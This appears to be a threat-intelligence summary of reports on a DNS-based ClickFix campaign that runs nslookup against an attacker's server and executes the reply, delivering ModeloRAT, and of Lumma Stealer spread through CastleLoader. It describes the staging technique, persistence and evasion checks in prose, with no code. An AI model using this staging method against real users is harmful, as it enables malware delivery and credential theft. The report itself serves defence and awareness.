Key Findings

• Microsoft has disclosed details of a new version of the ClickFix social engineering tactic that uses DNS lookups to retrieve malware payloads.

• The attack tricks users into running commands through the Windows Run dialog that perform a DNS lookup to an external server controlled by the attackers.

• The DNS response is then executed as the second-stage payload, allowing the threat actors to reach infrastructure under their control and establish a new validation layer.

• The downloaded payload initiates an attack chain leading to the deployment of ModeloRAT, a Python-based remote access trojan.

• The malware also creates a Windows shortcut (LNK) file in the Startup folder to establish persistence.

• Bitdefender has warned of a surge in Lumma Stealer activity driven by ClickFix-style fake CAPTCHA campaigns that distribute an AutoIt version of CastleLoader.

• CastleLoader is a malware loader associated with the GrayBravo threat actor group, incorporating checks to bypass security solutions before launching the stealer.

Background

ClickFix is an increasingly popular social engineering tactic that tricks unsuspecting users into running commands to infect their own machines with malware, allowing threat actors to bypass security controls. The method has spawned several variants, such as FileFix, JackFix, ConsentFix, CrashFix, and GlitchFix.

DNS-Based Malware Staging

• The latest DNS-based ClickFix attack uses the `nslookup` command to perform a DNS lookup against a hard-coded external server, rather than the system's default resolver.

• The DNS response is filtered to extract the `Name:` field, which is then executed as the second-stage payload.

• This approach reduces the dependency on traditional web requests and helps blend the malicious activity into normal network traffic.

Lumma Stealer Campaigns

• Bitdefender has observed a surge in Lumma Stealer activity, driven by ClickFix-style fake CAPTCHA campaigns that deploy an AutoIt version of CastleLoader.

• CastleLoader incorporates checks to determine the presence of virtualization software and security programs before decrypting and launching the stealer malware in memory.

• Websites advertising cracked software and pirated movies also serve as bait for CastleLoader-based attack chains, deceiving users into downloading rogue installers or executables.

• Lumma Stealer operations have demonstrated resilience, rapidly migrating to new hosting providers and adapting alternative loaders and delivery techniques.

Conclusion

The effectiveness of ClickFix lies in its abuse of procedural trust rather than technical vulnerabilities, as the instructions often resemble troubleshooting steps or verification workarounds that users may have encountered previously. This highlights the importance of user awareness and the need for robust security measures to protect against such social engineering attacks.

Sources

• https://thehackernews.com/2026/02/microsoft-discloses-dns-based-clickfix.html

• https://x.com/TheCyberSecHub/status/2023050328518873213

• https://x.com/AdliceSoftware/status/2023064774435541163

• https://www.cypro.se/2026/02/15/microsoft-discloses-dns-based-clickfix-attack-using-nslookup-for-malware-staging/

• https://www.ctrlaltnod.com/news/microsoft-warns-of-dns-based-clickfix-attacks-on-windows-users/